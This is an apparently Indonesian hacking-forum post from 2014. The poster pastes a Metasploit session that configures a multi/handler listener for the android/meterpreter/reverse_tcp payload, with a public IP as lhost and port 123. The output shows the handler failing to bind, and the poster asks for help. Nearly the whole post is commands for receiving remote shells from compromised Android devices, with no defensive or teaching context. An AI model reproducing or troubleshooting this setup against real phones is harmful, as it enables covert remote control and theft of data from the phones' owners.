[Share] Exploit Android Meterpreter IP Public
#27
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 95.128.181.59
lhost => 95.128.181.59
msf exploit(handler) > set lport 123
lport => 123
msf exploit(handler) > exploit

[-] Handler failed to bind to 95.xxx.xxx.xx:123
[*] Started reverse handler on 0.0.0.0:123
[*] Starting the payload handler...

Kalo failed gitu gimana om ? Big Grin
mohon pencerahannya Big Grin


Messages In This Thread
RE: Exploit Android Meterpreter IP Public - by eMJe009 - 04-19-2014, 02:00 AM




Users browsing this thread: 1 Guest(s)